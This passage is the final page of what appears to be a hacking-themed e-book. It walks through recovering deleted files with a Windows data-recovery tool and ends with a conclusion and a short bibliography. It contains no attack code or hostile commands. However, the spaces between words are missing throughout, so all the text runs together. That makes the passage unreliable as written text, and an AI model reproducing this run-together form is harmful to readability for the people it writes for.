SohereIamusingatoolnameas“stellarphonixwindowsdatarecovery”torecoverthepermanentlydeletedfiles.
Byusingthistoolyoucanrecoveryouraccidentlydeleteddatafromyourcomputer.
Forityouhavetofollowsimplestepsasmentionedbelow:
Clickontheoption“deletedfilerecovery”or“folderrecovery”accordingtoyourchoice.Thenchoosethelocaldrivefromwhereyouwanttoscanforthedeletedfiles/folder.Thenitasksyouforaquickscanordeepscan,youcanchooseasaccordingtoyourneed.
Afterthatitscansforallthedeletedfiles/folderfromyourparticularselectedlocaldrive.Andshowyouthelistoftheentirefolderfromwhichfilesaredeleted.
Thenyouhavetoselectyourdeletedfile/folderwhichyouwanttorecover,asIhaveselectedhere“hackingtools”fromthefolder“vi”.Andthenclickontherecoveroptiontorecoveryourdatasuccessfully.
Note:-Therecovereddatawillworkonlywhentheaddressofthatlocationisempty/notoverwrittenfromwherethatfile/folderisdeletedaccidently.
CONCLUSION:
ThanksForreadingthisbookandIhopethecontentsdescribedinthisbookwillhelpyoutoknowtheintentsofhackers.Nowyouarecapableofsecuringyourownandyoursurroundingcomputers,mobilephonesandothernetworksfromtheThreatwecalled“HACKINGAnartofexploitation”.
BIBLIOGRAPHY
THEBIGCOMPUTING.COMHackingfordummiesHackingexposedXDAdevelopersEtc.Findoutmore@
THEBIGCOMPUTINGdotCOMHACK-X-CRYPT
204